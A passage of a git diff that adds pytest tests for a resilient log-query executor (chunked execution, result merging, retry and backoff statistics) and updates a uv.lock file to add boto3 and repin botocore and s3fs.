+        )
+
+        # 3 hours / 30 min = 6 chunks expected; at least 4 calls are required.
+        assert "_chunked_execution" in outcome
+        assert len(chunk_starts) >= 4
+
+    @pytest.mark.asyncio
+    async def test_execute_chunked_disabled(self) -> None:
+        """With chunking disabled, a three-hour range is queried in a single call."""
+        executor = QueryResilientExecutor(enable_chunking=False)
+
+        invocations: list[dict[str, Any]] = []
+
+        async def count_calls(**kwargs: Any) -> dict[str, Any]:
+            # Keep the keyword arguments of each call so the calls can be counted.
+            invocations.append(kwargs)
+            return {"status": "success", "data": {"result": []}}
+
+        mock_query_fn = AsyncMock(side_effect=count_calls)
+
+        # Same three-hour range as the chunked tests, but chunking is off.
+        await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T13:00:00Z",
+        )
+
+        # Exactly one call means the range was not split.
+        assert len(invocations) == 1
+
+ @pytest.mark.asyncio
+ async def test_execute_chunked_merge_results(self) -> None:
+ """Test that chunked results are properly merged."""
+ executor = QueryResilientExecutor(chunk_size_minutes=30)
+
+ chunk_num = 0
+
+ async def return_chunk_results(**kwargs: Any) -> dict[str, Any]:
+ nonlocal chunk_num
+ chunk_num += 1
+ return {
+ "status": "success",
+ "data": {"result": [{"stream": {}, "values": [[chunk_num, f"log{chunk_num}"]]}]},
+ }
+
+ mock_query_fn = AsyncMock(side_effect=return_chunk_results)
+
+ # A 3-hour range exceeds the 2-hour chunking threshold, so execution is chunked
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T13:00:00Z", # 3 hours = 6 chunks
+ )
+
+ # Merged output should hold entries from multiple chunks (nominally 6: 3 hours / 30 min)
+ assert "data" in result
+ assert len(result["data"]["result"]) >= 2
+
+ def test_count_results_list(self) -> None:
+ """Test counting results from a list."""
+ executor = QueryResilientExecutor()
+
+ result = [1, 2, 3, 4, 5]
+ count = executor._count_results(result)
+
+ assert count == 5
+
+ def test_count_results_dict_with_streams(self) -> None:
+ """Test counting results from Loki-style response."""
+ executor = QueryResilientExecutor()
+
+ result = {
+ "data": {
+ "result": [
+ {"stream": {}, "values": [[1, "a"], [2, "b"]]},
+ {"stream": {}, "values": [[3, "c"]]},
+ ]
+ }
+ }
+ count = executor._count_results(result)
+
+ assert count == 3 # 2 + 1 values
+
+ def test_count_results_empty(self) -> None:
+ """Test counting results from empty response."""
+ executor = QueryResilientExecutor()
+
+ assert executor._count_results({}) == 0
+ assert executor._count_results({"data": {}}) == 0
+ assert executor._count_results({"data": {"result": []}}) == 0
+
+ def test_get_stats_summary(self) -> None:
+ """Test getting stats summary."""
+ executor = QueryResilientExecutor()
+ executor.stats.total_attempts = 10
+ executor.stats.successful_attempts = 8
+ executor.stats.timeout_count = 2
+ executor.stats.retry_count = 3
+ executor.stats.time_range_reductions = 1
+
+ summary = executor.get_stats_summary()
+
+ assert summary["total_attempts"] == 10
+ assert summary["successful_attempts"] == 8
+ assert summary["success_rate"] == "80.0%"
+ assert summary["timeout_count"] == 2
+ assert summary["retry_count"] == 3
+ assert summary["time_range_reductions"] == 1
+
+ def test_merge_chunk_results_empty(self) -> None:
+ """Test merging empty chunk results."""
+ executor = QueryResilientExecutor()
+
+ result = executor._merge_chunk_results([])
+
+ assert result["status"] == "success"
+ assert result["data"]["result"] == []
+
+ def test_merge_chunk_results_multiple(self) -> None:
+ """Test merging multiple chunk results."""
+ executor = QueryResilientExecutor()
+
+ chunks = [
+ {"data": {"result": [{"stream": "a", "values": [1, 2]}]}},
+ {"data": {"result": [{"stream": "b", "values": [3, 4]}]}},
+ {"data": {"result": [{"stream": "c", "values": [5]}]}},
+ ]
+
+ result = executor._merge_chunk_results(chunks)
+
+ assert result["status"] == "success"
+ assert len(result["data"]["result"]) == 3
+
+
+class TestGlobalExecutor:
+ """Tests for global executor functions."""
+
+ def test_get_resilient_executor_creates_default(self) -> None:
+ """Test that get_resilient_executor creates a default instance."""
+ reset_resilient_executor()
+
+ executor = get_resilient_executor()
+
+ assert executor is not None
+ assert isinstance(executor, QueryResilientExecutor)
+
+ reset_resilient_executor()
+
+ def test_get_resilient_executor_returns_same_instance(self) -> None:
+ """Test that get_resilient_executor returns the same instance."""
+ reset_resilient_executor()
+
+ executor1 = get_resilient_executor()
+ executor2 = get_resilient_executor()
+
+ assert executor1 is executor2
+
+ reset_resilient_executor()
+
+ def test_reset_resilient_executor(self) -> None:
+ """Test resetting the global executor."""
+ reset_resilient_executor()
+
+ executor1 = get_resilient_executor()
+ reset_resilient_executor()
+ executor2 = get_resilient_executor()
+
+ assert executor1 is not executor2
+
+ reset_resilient_executor()
+
+
+class TestTimeRangeFactors:
+ """Tests for time range reduction factors and backoff delays."""
+
+ def test_time_range_factors_order(self) -> None:
+ """Test that time range factors are in descending order."""
+ factors = QueryResilientExecutor.TIME_RANGE_FACTORS
+
+ assert factors == sorted(factors, reverse=True)
+ assert factors[0] == 1.0 # Start with full range
+ assert factors[-1] < 0.5 # End with small range
+
+ def test_backoff_delays_order(self) -> None:
+ """Test that backoff delays are in ascending order."""
+ delays = QueryResilientExecutor.BACKOFF_DELAYS
+
+ assert delays == sorted(delays)
+ assert delays[0] >= 1 # At least 1 second
+
+
+class TestEdgeCases:
+ """Tests for edge cases."""
+
+ @pytest.mark.asyncio
+ async def test_execute_with_z_suffix_timestamps(self) -> None:
+ """Test handling of Z suffix in timestamps."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}})
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T11:00:00Z",
+ )
+
+ assert result["status"] == "success"
+
+ @pytest.mark.asyncio
+ async def test_execute_with_offset_timestamps(self) -> None:
+ """Test handling of offset timestamps."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}})
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00+00:00",
+ end_time="2024-01-15T11:00:00+00:00",
+ )
+
+ assert result["status"] == "success"
+
+ @pytest.mark.asyncio
+ async def test_execute_with_grpc_error(self) -> None:
+ """Test handling of gRPC errors."""
+ executor = QueryResilientExecutor(max_retries=3)
+
+ mock_query_fn = AsyncMock(side_effect=Exception("grpc: connection failed"))
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ # Should give up on gRPC errors and move to next time range factor
+ assert result["status"] == "error"
+
+ @pytest.mark.asyncio
+ async def test_execute_with_non_timeout_error_response(self) -> None:
+ """Test handling of non-timeout error responses."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(
+ return_value={
+ "status": "error",
+ "error": "invalid query syntax",
+ }
+ )
+
+ await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ # A non-timeout error response must not be counted as a timeout.
+ # The returned result is not inspected here because it may carry extra metadata.
+ assert executor.stats.timeout_count == 0
diff --git a/uv.lock b/uv.lock
index 82f787e0..92e371b4 100644
--- a/uv.lock
+++ b/uv.lock
@@ -7,24 +7,6 @@ resolution-markers = [
"python_full_version < '3.11'",
]
-[[package]]
-name = "aiobotocore"
-version = "2.26.0"
-source = { registry = "https://pypi.org/simple" }
-dependencies = [
- { name = "aiohttp" },
- { name = "aioitertools" },
- { name = "botocore" },
- { name = "jmespath" },
- { name = "multidict" },
- { name = "python-dateutil" },
- { name = "wrapt" },
-]
-sdist = { url = "https://files.pythonhosted.org/packages/4d/f8/99fa90d9c25b78292899fd4946fce97b6353838b5ecc139ad8ba1436e70c/aiobotocore-2.26.0.tar.gz", hash = "sha256:50567feaf8dfe2b653570b4491f5bc8c6e7fb9622479d66442462c021db4fadc", size = 122026, upload-time = "2025-11-28T07:54:59.956Z" }
-wheels = [
- { url = "https://files.pythonhosted.org/packages/b7/58/3bf0b7d474607dc7fd67dd1365c4e0f392c8177eaf4054e5ddee3ebd53b5/aiobotocore-2.26.0-py3-none-any.whl", hash = "sha256:a793db51c07930513b74ea7a95bd79aaa42f545bdb0f011779646eafa216abec", size = 87333, upload-time = "2025-11-28T07:54:58.457Z" },
-]
-
[[package]]
name = "aiofiles"
version = "24.1.0"
@@ -129,15 +111,6 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/5d/28/a8a9fc6957b2cee8902414e41816b5ab5536ecf43c3b1843c10e82c559b2/aiohttp-3.13.2-cp313-cp313-win_amd64.whl", hash = "sha256:a88d13e7ca367394908f8a276b89d04a3652044612b9a408a0bb22a5ed976a1a", size = 452192, upload-time = "2025-10-28T20:57:34.166Z" },
]
-[[package]]
-name = "aioitertools"
-version = "0.13.0"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/fd/3c/53c4a17a05fb9ea2313ee1777ff53f5e001aefd5cc85aa2f4c2d982e1e38/aioitertools-0.13.0.tar.gz", hash = "sha256:620bd241acc0bbb9ec819f1ab215866871b4bbd1f73836a55f799200ee86950c", size = 19322, upload-time = "2025-11-06T22:17:07.609Z" }
-wheels = [
- { url = "https://files.pythonhosted.org/packages/10/a1/510b0a7fadc6f43a6ce50152e69dbd86415240835868bb0bd9b5b88b1e06/aioitertools-0.13.0-py3-none-any.whl", hash = "sha256:0be0292b856f08dfac90e31f4739432f4cb6d7520ab9eb73e143f4f2fa5259be", size = 24182, upload-time = "2025-11-06T22:17:06.502Z" },
-]
-
[[package]]
name = "aiosignal"
version = "1.4.0"
@@ -194,6 +167,7 @@ name = "ares"
version = "0.1.0"
source = { editable = "." }
dependencies = [
+ { name = "boto3" },
{ name = "cyclopts" },
{ name = "dreadnode" },
{ name = "httpx" },
@@ -226,6 +200,7 @@ dev = [
[package.metadata]
requires-dist = [
+ { name = "boto3", specifier = ">=1.42.25" },
{ name = "cyclopts", specifier = ">=4.2.0" },
{ name = "dreadnode", specifier = ">=1.17.0" },
{ name = "httpx", specifier = ">=0.28.0,<1.0.0" },
@@ -302,18 +277,32 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/02/e3/a4fa1946722c4c7b063cc25043a12d9ce9b4323777f89643be74cef2993c/backrefs-6.1-py39-none-any.whl", hash = "sha256:a9e99b8a4867852cad177a6430e31b0f6e495d65f8c6c134b68c14c3c95bf4b0", size = 381058, upload-time = "2025-11-15T14:52:06.698Z" },
]
+[[package]]
+name = "boto3"
+version = "1.42.25"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+ { name = "botocore" },
+ { name = "jmespath" },
+ { name = "s3transfer" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/29/30/755a6c4b27ad4effefa9e407f84c6f0a69f75a21c0090beb25022dfcfd3f/boto3-1.42.25.tar.gz", hash = "sha256:ccb5e757dd62698d25766cc54cf5c47bea43287efa59c93cf1df8c8fbc26eeda", size = 112811, upload-time = "2026-01-09T20:27:44.73Z" }
+wheels = [
+ { url = "https://files.pythonhosted.org/packages/14/79/012734f4e510b0a6beec2a3d5f437b3e8ef52174b1d38b1d5fdc542316d7/boto3-1.42.25-py3-none-any.whl", hash = "sha256:8128bde4f9d5ffce129c76d1a2efe220e3af967a2ad30bc305ba088bbc96343d", size = 140575, upload-time = "2026-01-09T20:27:42.788Z" },
+]
+
[[package]]
name = "botocore"
-version = "1.41.5"
+version = "1.42.25"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "jmespath" },
{ name = "python-dateutil" },
{ name = "urllib3" },
]
-sdist = { url = "https://files.pythonhosted.org/packages/90/22/7fe08c726a2e3b11a0aef8bf177e83891c9cb2dc1809d35c9ed91a9e60e6/botocore-1.41.5.tar.gz", hash = "sha256:0367622b811597d183bfcaab4a350f0d3ede712031ce792ef183cabdee80d3bf", size = 14668152, upload-time = "2025-11-26T20:27:38.026Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/2c/b5/8f961c65898deb5417c9e9e908ea6c4d2fe8bb52ff04e552f679c88ed2ce/botocore-1.42.25.tar.gz", hash = "sha256:7ae79d1f77d3771e83e4dd46bce43166a1ba85d58a49cffe4c4a721418616054", size = 14879737, upload-time = "2026-01-09T20:27:34.676Z" }
wheels = [
- { url = "https://files.pythonhosted.org/packages/4e/4e/21cd0b8f365449f1576f93de1ec8718ed18a7a3bc086dfbdeb79437bba7a/botocore-1.41.5-py3-none-any.whl", hash = "sha256:3fef7fcda30c82c27202d232cfdbd6782cb27f20f8e7e21b20606483e66ee73a", size = 14337008, upload-time = "2025-11-26T20:27:35.208Z" },
+ { url = "https://files.pythonhosted.org/packages/1e/b0/61e3e61d437c8c73f0821ce8a8e2594edfc1f423e354c38fa56396a4e4ca/botocore-1.42.25-py3-none-any.whl", hash = "sha256:470261966aab1d09a1cd4ba56810098834443602846559ba9504f6613dfa52dc", size = 14553881, upload-time = "2026-01-09T20:27:30.487Z" },
]
[[package]]
@@ -3008,16 +2997,27 @@ wheels = [
[[package]]
name = "s3fs"
-version = "2025.12.0"
+version = "0.4.2"
source = { registry = "https://pypi.org/simple" }
dependencies = [
- { name = "aiobotocore" },
- { name = "aiohttp" },
+ { name = "botocore" },
{ name = "fsspec" },
]
-sdist = { url = "https://files.pythonhosted.org/packages/cf/26/fff848df6a76d6fec20208e61548244639c46a741e296244c3404d6e7df0/s3fs-2025.12.0.tar.gz", hash = "sha256:8612885105ce14d609c5b807553f9f9956b45541576a17ff337d9435ed3eb01f", size = 81217, upload-time = "2025-12-03T15:34:04.754Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/d9/9a/504cb277632c4d325beabbd03bb43778f0decb9be22d9e0e6c62f44540c7/s3fs-0.4.2.tar.gz", hash = "sha256:2ca5de8dc18ad7ad350c0bd01aef0406aa5d0fff78a561f0f710f9d9858abdd0", size = 57527, upload-time = "2020-03-31T15:24:26.388Z" }
+wheels = [
+ { url = "https://files.pythonhosted.org/packages/b8/e4/b8fc59248399d2482b39340ec9be4bb2493846ac23641b43115a7e5cd675/s3fs-0.4.2-py3-none-any.whl", hash = "sha256:91c1dfb45e5217bd441a7a560946fe865ced6225ff7eb0fb459fe6e601a95ed3", size = 19791, upload-time = "2020-03-31T15:24:24.952Z" },
+]
+
+[[package]]
+name = "s3transfer"
+version = "0.16.0"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+ { name = "botocore" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/05/04/74127fc843314818edfa81b5540e26dd537353b123a4edc563109d8f17dd/s3transfer-0.16.0.tar.gz", hash = "sha256:8e990f13268025792229cd52fa10cb7163744bf56e719e0b9cb925ab79abf920", size = 153827, upload-time = "2025-12-01T02:30:59.114Z" }
wheels = [
- { url = "https://files.pythonhosted.org/packages/44/8c/04797ebb53748b4d594d4c334b2d9a99f2d2e06e19ad505f1313ca5d56eb/s3fs-2025.12.0-py3-none-any.whl", hash = "sha256:89d51e0744256baad7ae5410304a368ca195affd93a07795bc8ba9c00c9effbb", size = 30726, upload-time = "2025-12-03T15:34:03.576Z" },
+ { url = "https://files.pythonhosted.org/packages/fc/51/727abb13f44c1fcf6d145979e1535a35794db0f6e450a0cb46aa24732fe2/s3transfer-0.16.0-py3-none-any.whl", hash = "sha256:18e25d66fed509e3868dc1572b3f427ff947dd2c56f844a5bf09481ad3f3b2fe", size = 86830, upload-time = "2025-12-01T02:30:57.729Z" },
]
[[package]]